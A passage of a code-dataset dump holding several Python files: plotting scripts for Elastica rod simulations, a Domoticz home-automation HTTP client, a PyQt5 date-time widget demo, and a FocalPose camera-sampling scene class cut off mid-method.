mag_vel_orig)\n# # ax.lines[1].set_data(time, mag_vel_new)\n# else:\n# ax.plot(\n# time,\n# fwd_velocity,\n# color=color,\n# marker=\"o\",\n# linewidth=2,\n# label=\"forward\",\n# )\n# ax.plot(\n# time,\n# lat_velocity,\n# # color=\"xkcd : deep red\",\n# # c=\"xkcd: deep red\",\n# c = 'k',\n# marker=\"o\",\n# linewidth=2,\n# label=\"lateral\",\n# )\n# ax.legend()\n\n\nclass FlagellaPlotter(TwoDimensionalPlotter):\n \"\"\"Plots flagella quantities\"\"\"\n\n # pylint : disable=too-many-arguments\n def __init__(\n self, input_folder, output_folder, save_file, force_flag, display_flag\n ):\n # pylint : enable=too-many-arguments\n\n # self.file_metadata = [(\"Flagella\", \".txt\", (31 / 255, 119 / 255, 180 / 
255))]\n\n super(FlagellaPlotter, self).__init__(\n input_folder, output_folder, save_file, force_flag, display_flag\n )\n\n # Make any other changes to the figure here\n # Data-dependent maybe\n\n # Setting labels here\n self.axes[0].set_xlabel(\"Time (s)\")\n self.axes[0].set_ylabel(\"Position (micrometer)\")\n self.axes[0].set_title(\"x CoM position vs Time\")\n\n def plot(self, ax, data, color=(31 / 255, 119 / 255, 180 / 255), i_ax=None):\n \"\"\" Plots flagella data\n \"\"\"\n # Flagella data needs correction with the first instant\n time = data[0, :]\n pos = data[1, :] - data[1, 0]\n # print(time, pos)\n\n if ax.lines:\n for line in ax.lines:\n line.set_data(time, -1000.0 * pos)\n else:\n ax.plot(time, -1000 * pos, color=color, marker=\"o\", linewidth=2)\n\n\nclass WalkerPlotter(TwoDimensionalPlotter):\n \"\"\"Plots flagella quantities\"\"\"\n\n # pylint : disable=too-many-arguments\n def __init__(\n self, input_folder, output_folder, save_file, force_flag, display_flag\n ):\n # pylint : enable=too-many-arguments\n\n # self.file_metadata = [(\"Flagella\", \".txt\", (31 / 255, 119 / 255, 180 / 255))]\n\n super(WalkerPlotter, self).__init__(\n input_folder, output_folder, save_file, force_flag, display_flag\n )\n\n # Make any other changes to the figure here\n # Data-dependent maybe\n\n # Setting labels here\n self.axes[0].set_xlabel(\"Time (s)\")\n self.axes[0].set_ylabel(\"Displacement (millimeter)\")\n self.axes[0].set_title(\"Displacement vs Time\")\n\n def plot(self, ax, data, color=(31 / 255, 119 / 255, 180 / 255), i_ax=None):\n \"\"\" Plots walker data\n \"\"\"\n # Walker data plotted from the second instant\n # The first instant is just the initialization which is\n # discarded to give time for the structure to relax (ie contact etc.)\n\n # Walker data plotted with reference to the second instant\n # The first is initial time\n time = data[0, 1:]\n pos = data[1, 1:] - data[1, 1]\n\n if ax.lines:\n for line in ax.lines:\n line.set_data(time, -pos)\n else:\n # - in pos to correct for direction\n ax.plot(time, -pos, color=color, marker=\"o\", linewidth=2)\n\n\nclass SnakeVelocityPlotter(TwoDimensionalPlotter):\n \"\"\"Plots snake quantities\"\"\"\n\n # pylint : disable=too-many-arguments\n def __init__(\n self, input_folder, output_folder, save_file, force_flag, display_flag\n ):\n # pylint : enable=too-many-arguments\n\n # self.file_metadata = [(\"Flagella\", \".txt\", (31 / 255, 119 / 255, 180 / 255))]\n\n super(SnakeVelocityPlotter, self).__init__(\n input_folder, output_folder, save_file, force_flag, display_flag\n )\n\n # Setting labels here\n self.axes[0].set_xlabel(\"T\")\n self.axes[0].set_ylabel(\"V (m/s)\")\n self.axes[0].set_title(\"Velocity vs T\")\n\n def plot(self, ax, data, color=(31 / 255, 119 / 255, 180 / 255), i_ax=None):\n \"\"\" Plots muscularsnake data\n \"\"\"\n # Muscularsnake data plotted from the second instant\n # The first instant is just the initialization which is\n # discarded to give time for the structure to relax (ie contact etc.)\n\n # Muscularsnake data plotted with reference to the second instant\n # The first is initial time\n time = data[0, :]\n fwd_velocity = data[3, :]\n lat_velocity = data[4, :]\n\n if ax.lines:\n ax.lines[0].set_data(time, fwd_velocity)\n ax.lines[1].set_data(time, lat_velocity)\n else:\n ax.plot(\n time,\n fwd_velocity,\n color=color,\n marker=\"o\",\n linewidth=2,\n label=\"forward\",\n )\n ax.plot(\n time,\n lat_velocity,\n c=\"xkcd:reddish\",\n marker=\"o\",\n linewidth=2,\n label=\"lateral\",\n )\n ax.legend()\n\n 
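\n# NOTE (editor's sketch, not part of the original script): every plotter here\n# updates the figure in place instead of re-plotting each frame. A minimal,\n# self-contained illustration of that pattern, assuming only matplotlib:\n#\n# import matplotlib.pyplot as plt\n# fig, ax = plt.subplots()\n# (line,) = ax.plot([0.0, 1.0], [0.0, 1.0]) # first call creates the artist\n# line.set_data([0.0, 1.0], [1.0, 0.0]) # later frames mutate its data\n# fig.canvas.draw() # redraw with the new data\n#\n# This mirrors the \"if ax.lines: ... else: ax.plot(...)\" branches used above.\n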
self.file_metadata = [(\"timoshenko_final_shape\", \".txt\", to_rgb(\"xkcd:bluish\"))]\n\n super(TimoshenkoPlotter, self).__init__(\n input_folder, output_folder, save_file, force_flag, display_flag\n )\n\n # Setting labels here\n self.axes[0].set_xlabel(\"X (m)\")\n self.axes[0].set_ylabel(\"Y (m)\")\n self.axes[0].set_title(\"Centerline deflection\")\n\n print(\"TimoshenkoPlotter initialized!\")\n\n def plot(self, ax, data, color=(31 / 255, 119 / 255, 180 / 255), i_ax=None):\n \"\"\" Plots timoshenko data\n \"\"\"\n # Timoshenko data needs correction with the first instant\n ax.plot(\n data[0, :],\n data[1, :],\n color=color,\n marker=\"o\",\n linewidth=2,\n label=\"simulation\",\n )\n ax.plot(\n data[3, :],\n data[4, :],\n color=\"k\",\n linestyle=\"dashed\",\n linewidth=2,\n label=\"analytical\",\n )\n ax.legend()\n\n # In this case as soon as we plot, we can exit\n plt.pause(10.0)\n import sys\n\n sys.exit(0)\n\n\nclass HelicalPhiPlotter(TwoDimensionalPlotter):\n \"\"\"Plots helical phi \"\"\"\n\n # pylint : disable=too-many-arguments\n def __init__(\n self, input_folder, output_folder, save_file, force_flag, display_flag\n ):\n # pylint : enable=too-many-arguments\n\n self.file_metadata = [(\"helix_0100_shape\", \".txt\", to_rgb(\"xkcd:bluish\"))]\n\n super(HelicalPhiPlotter, self).__init__(\n input_folder, output_folder, save_file, force_flag, display_flag\n )\n # length of rod\n self.L = 100.0\n\n # Setting labels here\n self.axes[0].set_xlabel(\"s - L/2\")\n self.axes[0].set_ylabel(\"phi\")\n self.axes[0].set_title(\"phi vs s\")\n\n def envelope(self, arg_pos):\n \"\"\"\n Given points, computes the arc length and envelope of the curve\n \"\"\"\n n_points = arg_pos.shape[1]\n\n # Computes the direction in which the rod points\n # in our cases it should be the z-axis\n rod_direction = arg_pos[:, -1] - arg_pos[:, 0]\n rod_direction /= norm(rod_direction, ord=2, axis=0)\n\n # Compute local tangent directions\n tangent_s = np.diff(arg_pos, n=1, axis=-1) # x_(i+1)-x(i)\n length_s = norm(tangent_s, ord=2, axis=0)\n tangent_s /= length_s\n\n # Dot product with direction is cos_phi, see RSOS\n cos_phi_s = np.einsum(\"ij,i->j\", tangent_s, rod_direction)\n\n # Compute phi-max now\n phi = np.arccos(cos_phi_s)\n cos_phi_max = np.cos(np.max(phi))\n\n # Return envelope and arclength\n envelope = (cos_phi_s - cos_phi_max) / (1.0 - cos_phi_max)\n # -0.5 * length accounts for the element/node business\n arclength = np.cumsum(length_s) - 0.5 * length_s[0]\n\n return arclength, envelope\n\n def analytical_solution(self):\n \"\"\" Gives the analytical solution of the helicalbuckling case\n \"\"\"\n # Physical parameters, set from the simulation\n B = 1.345\n C = 0.789\n gamma = C / B\n R = 27.0 * 2.0 * np.pi\n d = 0.03\n D = d * self.L\n nu = 1.0 / gamma - 1.0\n\n # These are magic constants, but you can obtain them by solving\n # this equation (accoring to matlab syntax)\n # syms x y\n # S = vpasolve([d == sqrt(16/y*(1-x*x/(4*y))), R == x/gamma+4*acos(x/(2*sqrt(y)))], [x, y]);\n # moment = double(S.x); # dimensionless end moment\n # tension = double(S.y); # dimensionless end torque\n # This comes from Eqs. 14-15 of \"Writhing instabilities of twisted rods: from\n # infinite to finite length\", 2001\n # We did not want to introduce sympy dependency here, so we decided to hardcode\n # the solutions instead\n moment = 98.541496171190744\n tension = 2.900993205792131e3\n\n # Compute maximum envelope angle according to Eq. 
13 of \"Writhing\n # instabilities of twisted rods: from infinite to finite length\", 2001\n thetaMax = np.arccos(moment * moment / (2.0 * tension) - 1.0)\n\n # Compute actual end torque and tension according to \"Writhing\n # instabilities of twisted rods: from infinite to finite length\", 2001\n M = moment * B / self.L\n T = tension * B / (self.L * self.L)\n\n # Compute dimensionless load according to Eq. 30 of \"Helical and localised\n # buckling in twisted rods: a unified analysis of the symmetric case\", 2000\n m = M / np.sqrt(B * T)\n\n # Setup for analytical curve calculation\n s = np.linspace(-0.5, 0.5, 10000)\n t = T * self.L * self.L / (4 * np.pi * np.pi * B)\n mz = M * self.L / (2 * np.pi * B)\n root = np.sqrt(4 * t - mz * mz)\n\n # This is the analytical curve computed\n # according to Eqs. 27 and 52 of\n # \"Instability and self-contact phenomena in the writhing of clamped rods\",\n # 2003\n xs = (\n 1.0\n / (2.0 * np.pi * t)\n * root\n * np.sin(mz * np.pi * s)\n / np.cosh(np.pi * s * root)\n )\n ys = (\n -1.0\n / (2.0 * np.pi * t)\n * root\n * np.cos(mz * np.pi * s)\n / np.cosh(np.pi * s * root)\n )\n zs = s - 1.0 / (2.0 * np.pi * t) * root * np.tanh(np.pi * s * root)\n pos = np.vstack((xs, ys, zs)) * self.L\n return self.envelope(pos)\n\n def plot(self, ax, data, color=(31 / 255, 119 / 255, 180 / 255), i_ax=None):\n \"\"\" Plots muscularsnake data\n \"\"\"\n # Muscularsnake data plotted from the second instant\n # The first instant is just the initialization which is\n # discarded to give time for the structure to relax (ie contact etc.)\n\n # Muscularsnake data plotted with reference to the second instant\n # The first is initial time\n if ax.lines:\n pass\n else:\n analytical_centerline, analytical_envelope = self.analytical_solution()\n num_centerline, num_envelope = self.envelope(data)\n\n ax.plot(\n num_centerline - 0.5 * self.L,\n num_envelope,\n color=color,\n marker=\"o\",\n linewidth=2,\n label=\"numerical\",\n )\n ax.plot(\n analytical_centerline - 0.5 * self.L,\n analytical_envelope,\n c=\"black\",\n linestyle=\"--\",\n linewidth=1,\n label=\"analytical\",\n )\n ax.legend()\n\n\nclass WingPlotter(TwoDimensionalPlotter):\n \"\"\"Plots wing quantities\"\"\"\n\n # pylint : disable=too-many-arguments\n def __init__(\n self, input_folder, output_folder, save_file, force_flag, display_flag\n ):\n # pylint : enable=too-many-arguments\n\n # self.file_metadata = [(\"Flagella\", \".txt\", (31 / 255, 119 / 255, 180 / 255))]\n\n super(WingPlotter, self).__init__(\n input_folder, output_folder, save_file, force_flag, display_flag\n )\n\n # Setting labels here\n self.axes[0].set_xlabel(\"T (s)\")\n self.axes[0].set_ylabel(\"Angle (degrees)\")\n self.axes[0].set_title(\"Angle vs T\")\n\n def plot(self, ax, data, color=(31 / 255, 119 / 255, 180 / 255), i_ax=None):\n \"\"\" Plots wing data\n \"\"\"\n # Wing data plotted from the second instant\n # The first instant is just the initialization which is\n # discarded to give time for the structure to relax (ie contact etc.)\n\n # Wing data plotted with reference to the second instant\n # The first is initial time\n time = (data[0, 1:] - 0.125) / (\n 0.38\n ) # Accounts for initialization time and period\n dv_angle = data[1, 1:] # dorsoventral\n ap_angle = data[2, 1:] # anterio-posterior\n elb_angle = data[3, 1:] # elbow-angle\n\n if ax.lines:\n ax.lines[0].set_data(time, dv_angle)\n ax.lines[1].set_data(time, ap_angle)\n ax.lines[2].set_data(time, elb_angle)\n else:\n ax.plot(\n time,\n dv_angle,\n color=color,\n marker=\"o\",\n 
linewidth=2,\n label=\"dorsoventral\",\n )\n ax.plot(\n time,\n ap_angle,\n color=\"xkcd:reddish\",\n marker=\"o\",\n linewidth=2,\n label=\"anterio-posterior\",\n )\n ax.plot(\n time,\n elb_angle,\n color=\"xkcd:greenish\",\n marker=\"o\",\n linewidth=2,\n label=\"elbow\",\n )\n ax.legend()\n\n\ndef parse_args(args=None):\n \"\"\"Parse arguments from commandline\"\"\"\n parser = argparse.ArgumentParser(\n description=sys.modules[__name__].__doc__, formatter_class=CustomFormatter\n )\n\n parser.add_argument(\n \"-c\",\n \"--case\",\n choices=[\n \"timoshenkobeam\",\n \"helicalbuckling\",\n \"sphericaljoint\",\n \"hingejoint\",\n \"fixedjoint\",\n \"pullingmuscle\",\n \"snake\",\n \"elbow\",\n \"flagella\",\n \"walker\",\n \"muscularsnake\",\n \"wing\",\n ],\n help=\"simulation case whose output needs to be seen\",\n type=str,\n )\n\n parser.add_argument(\n \"-o\",\n \"--output\",\n metavar=\"OUTFILE\",\n help=\"if enabled, stores the images as OUTFILE_{1,2,...,N}.pdf,\\\n in the scripts/pyprocessed_ directory\",\n default=\"out\",\n type=str,\n )\n\n parser.add_argument(\n \"-p\",\n \"--path\",\n metavar=\"OUTPATH\",\n help=\"path to store output files, is default created to\\\n pyprocessed_case if not initialized\",\n default=\"./pyprocessed\",\n type=str,\n )\n\n parser.add_argument(\n \"-f\",\n \"--force\",\n help=\"force rewrite of any previously saved images\",\n action=\"store_true\",\n )\n\n parser.add_argument(\n \"-a\",\n \"--animate\",\n help=\"force collate pngs (ffmpeg) after saving them\",\n action=\"store_true\",\n )\n\n parser.add_argument(\n \"-n\",\n \"--nodisp\",\n help=\"do not render images on the screen but only save (faster!)\",\n action=\"store_true\",\n )\n\n if len(args) < 2:\n parser.print_help()\n sys.exit(42)\n\n return parser.parse_args(args)\n\n\ndef find_results(folder_name):\n \"\"\" Given a folder name, traverse the current dir to find the folder,if not\n found travel its parent, and so on until root.\n Credits: https://stackoverflow.com/a/37560251\n \"\"\"\n cur_dir = os.getcwd()\n\n while True:\n parent_dir = os.path.dirname(cur_dir)\n test_dir = os.path.join(cur_dir, folder_name)\n #\n if os.path.isdir(test_dir): # pylint : disable=no-else-return\n return test_dir\n else:\n if cur_dir == parent_dir: # if dir is root dir\n raise FileNotFoundError(\"Folder {} not found\".format(folder_name))\n else:\n cur_dir = parent_dir\n\n\ndef main(argv):\n \"\"\" main function coordinating output\n \"\"\"\n\n \"\"\"Parse opts\"\"\"\n options = parse_args(argv)\n\n case_name = options.case\n output_file = options.output\n output_folder = options.path\n force_flag = options.force\n animate_flag = options.animate\n display_flag = not options.nodisp\n\n \"\"\"Process flags\"\"\"\n input_folder = find_results(\"run_\" + case_name)\n\n output_folder = os.path.abspath(os.path.join(output_folder, case_name))\n # Lazy to implement version safe code\n os.makedirs(output_folder, exist_ok=True)\n\n tre_d_plotter = None\n two_d_plotter = None\n\n two_display_flag = display_flag\n three_display_flag = display_flag\n\n \"\"\"Decide and process\"\"\"\n if case_name == \"timoshenkobeam\":\n two_d_plotter = TimoshenkoPlotter\n elif case_name == \"helicalbuckling\":\n two_d_plotter = HelicalPhiPlotter\n tre_d_plotter = HelicalBucklingPlotter\n elif case_name == \"elbow\":\n two_d_plotter = ElbowPlotter\n elif case_name == \"flagella\":\n two_d_plotter = FlagellaPlotter\n elif case_name == \"walker\":\n two_d_plotter = WalkerPlotter\n elif case_name == \"muscularsnake\":\n two_d_plotter 
= SnakeVelocityPlotter\n elif case_name == \"wing\":\n two_d_plotter = WingPlotter\n elif case_name == \"sphericaljoint\":\n tre_d_plotter = SphericalJointPlotter\n elif case_name == \"hingejoint\":\n tre_d_plotter = HingeJointPlotter\n elif case_name == \"fixedjoint\":\n tre_d_plotter = FixedJointPlotter\n elif case_name == \"pullingmuscle\":\n tre_d_plotter = PullingMusclePlotter\n elif case_name == \"snake\":\n two_d_plotter = SnakeVelocityPlotter\n tre_d_plotter = SnakePlotter\n\n if tre_d_plotter is None:\n tre_d_plotter = DummyPlotter\n three_display_flag = False\n if two_d_plotter is None:\n two_d_plotter = DummyPlotter\n two_display_flag = False\n\n # Order important here, people are interested in seeing the plots first\n # to see whether something happened or not\n plotters = [\n tre_d_plotter(\n input_folder, output_folder, output_file, force_flag, three_display_flag\n ),\n two_d_plotter(\n input_folder, output_folder, output_file, force_flag, two_display_flag\n ),\n ]\n\n # pylint: disable=expression-not-assigned\n if not animate_flag:\n [plotter.process() for plotter in plotters]\n elif force_flag and animate_flag:\n [plotter.process() for plotter in plotters]\n [plotter.animate() for plotter in plotters]\n else:\n # Assume images have been done at output folder, you can just animate them now\n [plotter.animate() for plotter in plotters]\n # pylint: enable=expression-not-assigned\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","repo_name":"mattialab/elastica","sub_path":"scripts/plot_results.py","file_name":"plot_results.py","file_ext":"py","file_size_in_byte":56426,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"61"} +{"seq_id":"23138109282","text":"# -*- coding: latin-1 -*-\n'''\n@author: 2017 jingl3s at yopmail dot com\n'''\n\n# license\n# \n# This code is free software; you can redistribute it and/or modify it\n# under the terms of the DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE (see the file\n# LICENSE included with the distribution).\n\nimport requests\nimport logging\nimport json\n\n\nclass Domoticz(object):\n '''\n Sends commands to the Domoticz server\n '''\n\n def __init__(self):\n '''\n\n '''\n self._logger = logging.getLogger(self.__class__.__name__)\n self._adresse = None\n self._url_lit = None\n self._url_cmd_domoticz = None\n self._requete_val = None\n self._last_idx = None # ensure the attribute exists before the first lit_valeur() call\n\n def set_adresse(self, adresse):\n self._adresse = adresse\n\n def set_url_lecture(self, url_lecture):\n self._url_lit = url_lecture\n\n def modifier_interrupteur(self, idx_capteur, interrupteur_demande, chaine_valeur_inter, url_ecrit):\n '''\n Changes the position of a switch, but only if it is not already in the requested position\n :param idx_capteur:\n :param interrupteur_demande:\n :param chaine_valeur_inter:\n :param url_ecrit:\n '''\n self._verifier_entree()\n\n self._domoticz_commande_selecteur(\n idx_capteur, interrupteur_demande, chaine_valeur_inter, url_ecrit)\n\n\n def lit_information_capteur(self, idx_capteur):\n # fetch the value\n self._mise_a_jour_url_lit_capteur(idx_capteur)\n self._requete_val = self._domoticz_requete()\n self._last_idx = idx_capteur\n\n\n def lit_valeur(self, idx_capteur, chaine_valeur_inter):\n if self._last_idx != idx_capteur:\n self.lit_information_capteur(idx_capteur)\n \n # fetch the value\n valeur_interrupteur = self._domoticz_val_inter(\n self._requete_val, idx_capteur, chaine_valeur_inter)\n return valeur_interrupteur\n\n\n def _verifier_entree(self):\n if self._adresse is None:\n
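 # (editor's note) fail fast with an explicit message here, instead of\n # letting requests.get() fail later on a malformed URL.\n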
raise ValueError(\"Propriete adresse non definie.\")\n if self._url_lit is None:\n raise ValueError(\n \"Propriete information complement url pour information non definie.\")\n\n def _mise_a_jour_url_lit_capteur(self, idx_capteur):\n self._url_domoticz = self._adresse + \\\n self._url_lit + idx_capteur\n\n def _mise_a_jour_url_ecrit_capteur(self, url_cmd, valeur):\n self._url_domoticz = self._adresse + \\\n url_cmd + valeur\n\n def _domoticz_val_inter(self, json_resultat_requete, idx_capteur, str_json_champ):\n '''\n Renvoi la valeur d'un catpeur ou None si le capteur n'est pas trouvé dans la réponse\n :param json_resultat_requete:\n :param idx_capteur:\n :param str_json_champ:\n '''\n\n valeur = None\n capteur_trouve = False\n if json_resultat_requete is not None:\n try:\n if json_resultat_requete[\"status\"] == \"OK\":\n for i, _ in enumerate(json_resultat_requete[\"result\"]):\n if json_resultat_requete[\"result\"][i][\"idx\"] == str(idx_capteur):\n capteur_trouve = True\n # Level correspond à la valeur du selecteur dans\n # domoticz\n valeur = json_resultat_requete[\n \"result\"][0][str_json_champ]\n except Exception as e:\n self._logger.error(\n \"Erreur lecture information domoticz, execution continue\" + str(e))\n\n if not capteur_trouve:\n self._logger.debug(\"Domoticz serveur ou Capteur non répondus.\")\n\n return valeur\n\n def _domoticz_requete(self):\n '''\n @return: json structure de la réponse si OK pour le status\n Sinon retourne None\n '''\n json_object = None\n try:\n response = requests.get(self._url_domoticz)\n json_object = json.loads(response.text)\n if json_object[\"status\"] != \"OK\":\n self._logger.error(\"Cmd URL a echoué. cmd : '{}', reponse : '{}'\".format(\n json_object, self._url_cmd_domoticz))\n json_object = None\n except Exception as e:\n raise Exception(e)\n return json_object\n\n def _domoticz_commande_selecteur(self, idx_capteur, interrupteur_demande, chaine_valeur_inter, url_ecrit):\n\n # recuperation de la valeur\n self._mise_a_jour_url_lit_capteur(idx_capteur)\n requete_val = self._domoticz_requete()\n valeur_interrupteur = self._domoticz_val_inter(\n requete_val, idx_capteur, chaine_valeur_inter)\n\n # Positionnement de l'interrupteur si besoin seulement\n if str(valeur_interrupteur) != interrupteur_demande:\n self._logger.debug(\n \"Positionnement de l'interrupteur a : {}\".format(interrupteur_demande))\n self._mise_a_jour_url_ecrit_capteur(\n url_ecrit, interrupteur_demande)\n self._domoticz_requete()\n else:\n self._logger.debug(\"Aucun changement interrupteur\")\n","repo_name":"jingl3s/domoticz_hydroquebec","sub_path":"domoticz/domoticz.py","file_name":"domoticz.py","file_ext":"py","file_size_in_byte":5176,"program_lang":"python","lang":"fr","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"6224914512","text":"from PyQt5.Qt import *\n\nclass Window(QWidget):\n def __init__(self):\n super().__init__()\n self.setWindowTitle(\"QDateTimeEdit的学习\")\n self.resize(500, 500)\n self.setup_ui()\n\n def setup_ui(self):\n dte = QDateTimeEdit(self)\n # dte = QDateTimeEdit(QDateTime.currentDateTime(), self) # 获取当前时间日期\n # dte = QDateTimeEdit(QDate.currentDate(), self) # 获取当前日期\n # dte = QDateTimeEdit(QTime.currentTime(), self) # 获取当前时间\n dte.move(100, 100)\n\n dte.setDisplayFormat(\"yyyy-MM-dd HH: mm: ss\") # 设置显示格式\n\n btn = QPushButton(self)\n btn.move(200, 200)\n btn.setText(\"测试\")\n # btn.clicked.connect(lambda :print(dte.currentSectionIndex()))\n def test():\n # print(\"xxx\")\n # dte.setFocus()\n # dte.setCurrentSectionIndex(3) 
\n # dte.setCurrentSection(QDateTimeEdit.DaySection) # set the currently selected section\n # print(dte.sectionText(QDateTimeEdit.DaySection)) # get the text of the currently selected section\n # dte.setMaximumDateTime(QDateTime(2020, 8, 15, 12, 30)) # set the maximum date and time\n #\n # dte.setMinimumDateTime(QDateTime.currentDateTime())\n\n # dte.setDateTimeRange(QDateTime.currentDateTime().addDays(-3), QDateTime.currentDateTime().addDays(3)) # set the date and time range\n # print(dte.dateTime()) # get the date and time\n print(dte.date()) # get the date\n print(dte.time()) # get the time\n\n btn.clicked.connect(test)\n print(dte.sectionCount())\n dte.setCalendarPopup(True) # enable the calendar popup\n\n dte.dateTimeChanged.connect(lambda val:print(val))\n dte.dateChanged.connect(lambda val: print(\"date changed\", val))\n dte.timeChanged.connect(lambda val: print(\"time changed\", val))\n\n\n\nif __name__ == '__main__':\n import sys\n app = QApplication(sys.argv)\n\n window = Window()\n window.show()\n\n\n sys.exit(app.exec_())","repo_name":"ywkangkai/PythonGUI","sub_path":"GUI/时间控件/QDateTimeEdit/21-QDateTimeEdit-功能测试.py","file_name":"21-QDateTimeEdit-功能测试.py","file_ext":"py","file_size_in_byte":2062,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"72966081475","text":"import numpy as np\nimport pinocchio as pin\nfrom scipy.spatial.transform import Rotation\n\nfrom focalpose.simulator import Camera\nfrom focalpose.recording.bop_recording_scene import BopRecordingScene, SamplerError\nfrom focalpose.config import LOCAL_DATA_DIR\nfrom focalpose.datasets.real_dataset import Pix3DDataset, CompCars3DDataset, StanfordCars3DDataset\nfrom focalpose.fitting.nonparametric_model import NonparametricModel\nfrom focalpose.fitting.fitting import get_outliers\n\nTOP,LEFT,BOTTOM,RIGHT=range(4)\n\nclass BopRecordingSceneNonparametric(BopRecordingScene):\n def __init__(self,\n deltas=None,\n outliers = 0.05,\n nonparam_q=0.95,\n soft_border_check_enlargement=2,\n soft_border_check_treshold=0.50,\n area_check=0.03,\n\n urdf_ds='ycbv',\n texture_ds='shapenet',\n domain_randomization=True,\n background_textures=False,\n textures_on_objects=False,\n n_objects_interval=(1, 1),\n #objects_xyz_interval=((0.0, -0.5, -0.15), (1.0, 0.5, 0.15)),\n proba_falling=0.0,\n resolution=(640, 480),\n #focal_interval=(515, 515),\n #camera_distance_interval=(0.5, 1.5),\n border_check=False,\n gpu_renderer=True,\n n_textures_cache=50,\n seed=0):\n\n super().__init__(\n urdf_ds=urdf_ds,\n texture_ds=texture_ds,\n domain_randomization=domain_randomization,\n background_textures=background_textures,\n textures_on_objects=textures_on_objects,\n n_objects_interval=n_objects_interval,\n #objects_xyz_interval=objects_xyz_interval,\n proba_falling=proba_falling,\n resolution=resolution,\n #focal_interval=focal_interval,\n #camera_distance_interval=camera_distance_interval,\n border_check=border_check,\n gpu_renderer=gpu_renderer,\n n_textures_cache=n_textures_cache,\n seed=seed)\n\n assert (not soft_border_check_enlargement and not soft_border_check_treshold) or \\\n (soft_border_check_enlargement > 1 and soft_border_check_treshold >= 0 and soft_border_check_treshold <= 1)\n\n self.soft_border_check_enlargement = soft_border_check_enlargement\n self.soft_border_check_treshold = soft_border_check_treshold\n self.area_check=area_check\n \n if urdf_ds == 'pix3d-sofa':\n self.real_dataset = Pix3DDataset(LOCAL_DATA_DIR / 'pix3d', 'sofa')\n elif urdf_ds == 'pix3d-bed':\n self.real_dataset = Pix3DDataset(LOCAL_DATA_DIR / 'pix3d', 'bed')\n elif urdf_ds == 'pix3d-table':\n self.real_dataset = Pix3DDataset(LOCAL_DATA_DIR / 'pix3d',
'table')\n elif 'pix3d-chair' in urdf_ds:\n self.real_dataset = Pix3DDataset(LOCAL_DATA_DIR / 'pix3d', 'chair')\n elif 'stanfordcars' in urdf_ds:\n self.real_dataset = StanfordCars3DDataset(LOCAL_DATA_DIR / 'StanfordCars')\n elif 'compcars' in urdf_ds:\n self.real_dataset = CompCars3DDataset(LOCAL_DATA_DIR / 'CompCars')\n\n if outliers > 0:\n t = self.real_dataset.TCO[:,:3,3]\n zf = np.vstack([t[:,2], self.real_dataset.f]).T\n self.real_dataset.index = self.real_dataset.index.drop(get_outliers(zf, outliers))\n\n if deltas is None:\n self.nonparametric_model = NonparametricModel.fit(self.real_dataset, nonparam_q)\n else:\n self.nonparametric_model = NonparametricModel(\n self.real_dataset,\n deltas['R'],\n deltas['x'],\n deltas['y'],\n deltas['z'],\n deltas['f'])\n\n def sample_camera(self):\n TWC,f = self.sample_TWC_f()\n return self.create_camera(TWC,f)\n\n def sample_TWC_f(self):\n R,t,f = self.nonparametric_model.sample()\n Rt = np.hstack([R,t.reshape(-1,1)])\n TWC = np.vstack([ Rt , [0,0,0,1] ])\n return TWC,f\n\n def create_camera(self, TWC, f, enlargement_factor=1):\n K = np.zeros((3, 3), dtype=np.float)\n W, H = max(self.resolution), min(self.resolution)\n K[0, 0] = f\n K[1, 1] = f\n K[0, 2] = W / 2 * enlargement_factor\n K[1, 2] = H / 2 * enlargement_factor\n K[2, 2] = 1.0\n cam = Camera(resolution=self.resolution, client_id=self._client_id)\n h,w = self.resolution\n cam.set_intrinsic_K(K, h=h*enlargement_factor, w=w*enlargement_factor)\n cam.set_extrinsic_T(TWC)\n return cam\n\n @staticmethod\n def check_area(uniqs, cam_obs, q):\n mask = cam_obs['mask']\n for uniq in uniqs[uniqs > 0]:\n ids = np.where(mask == uniq)\n bbox_area = (ids[0].max()-ids[0].min()) * (ids[1].max()-ids[1].min())\n if bbox_area / (mask.shape[0]*mask.shape[1]) < q:\n return False\n return True\n\n @staticmethod\n def intersection_area(a, b):\n intersection = (\n max(a[TOP], b[TOP]),\n max(a[LEFT], b[LEFT]),\n min(a[BOTTOM], b[BOTTOM]),\n min(a[RIGHT], b[RIGHT]))\n\n if intersection[LEFT] < intersection[RIGHT] and intersection[TOP] < intersection[BOTTOM]:\n return (intersection[BOTTOM]-intersection[TOP])*(intersection[RIGHT]-intersection[LEFT])\n else:\n return 0\n\n @staticmethod\n def check_border_soft(uniqs, cam_obs, resolution, q, treshold):\n mask = cam_obs['mask']\n h,w = resolution\n img_h = h/q\n img_w = w/q\n padding_h = (h - img_h)/2\n padding_w = (w - img_w)/2\n img_bbox = (padding_h, padding_w, padding_h+img_h, padding_w+img_w)\n\n for uniq in uniqs[uniqs > 0]:\n ids = np.where(mask == uniq)\n object_bbox = (ids[0].min(), ids[1].min(), ids[0].max(), ids[1].max())\n object_area = (object_bbox[BOTTOM]-object_bbox[TOP])*(object_bbox[RIGHT]-object_bbox[LEFT])\n intersection_area = BopRecordingSceneNonparametric.intersection_area(img_bbox, object_bbox)\n\n if intersection_area / object_area < treshold:\n return False\n \n return True\n\n\n def camera_rand(self):\n N = 0\n valid = False\n self.cam_obs = None\n\n while not valid:\n N += 1\n if N > 3:\n raise SamplerError('Cannot sample valid camera configuration.')\n \n TWC,f = self.sample_TWC_f()\n cam = self.create_camera(TWC, f, enlargement_factor=self.soft_border_check_enlargement)\n cam_obs_ = cam.get_state()\n mask = cam_obs_['mask']\n mask[mask == self.background._body_id] = 0\n mask[mask == 255] = 0\n uniqs = np.unique(cam_obs_['mask'])\n\n \n valid = len(uniqs) == len(self.bodies) + 1 and np.sum(mask) > 0\n if not valid: continue\n \n if self.soft_border_check_enlargement and not self.border_check:\n # check that object is inside enlarged image 
